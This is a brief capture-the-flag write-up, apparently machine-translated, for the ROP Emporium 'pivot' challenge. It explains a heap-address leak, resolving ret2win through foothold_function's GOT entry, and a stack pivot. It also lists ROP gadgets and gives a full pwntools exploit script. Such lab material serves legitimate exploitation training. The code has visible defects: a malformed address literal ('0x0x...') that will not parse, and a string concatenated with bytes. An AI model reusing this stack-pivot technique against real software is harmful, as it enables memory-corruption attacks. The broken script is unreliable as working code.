pivot ROP Emporium

open ida, Found a heap space , And tell us the address , It seems that we should make use of stack space

open .so file , There is still a function that can open files

But the function's plt It didn't show up , That is to say, we cannot directly use

Here is a function that gives a hint , Prompt us , utilize function Of .plt Indirect access ret2win The address of

Next, let's try to run it once function Of plt, send got Table update , And then got Address after table update , Put the content on the heap , Then use stack offset to run to the heap .payload1 It's in the pile ,payload2 It's in the stack .

0x00000000004006b0 : call rax
0x00000000004009c0 : mov rax, qword ptr [rax] ; ret
0x00000000004009c4 : add rax, rbp ; ret
0x00000000004009bb : pop rax ; ret
0x00000000004007c8 : pop rbp ; ret
0x00000000004009bd : xchg rax, rsp ; ret

from pwn import *
binary = "./pivot"

io = process(binary)
elf = ELF(binary)
lib = ELF("./libpivot.so")
leave_ret=0x0x0000000000400740
pop_rax = 0x4009bb
pop_rbp = 0x4007c8
mov_rax_rax = 0x4009c0
add_rax_rbp = 0x4009c4
call_rax = 0x4006b0

foothold_plt = elf.plt['foothold_function']
foothold_got = elf.got['foothold_function']
offset = int(lib.sym['ret2win']-lib.sym['foothold_function'])
leakaddr = u64(io.recv(6).ljust(8,b'\x00'))


payload_1 = p64(foothold_plt)
payload_1 += p64(pop_rax)
payload_1 += p64(foothold_got)
payload_1 += p64(mov_rax_rax)
payload_1 += p64(pop_rbp)
payload_1 += p64(offset)
payload_1 += p64(add_rax_rbp)
payload_1 += p64(call_rax)
    
io.sendline(payload_1)


payload_2 = "a" * 32
payload_2 += p64(leave_ret)
payload_2 += p64(leakaddr-8) 
    
io.recvuntil(">")
io.sendline(payload_2)
    
print (io.recvall())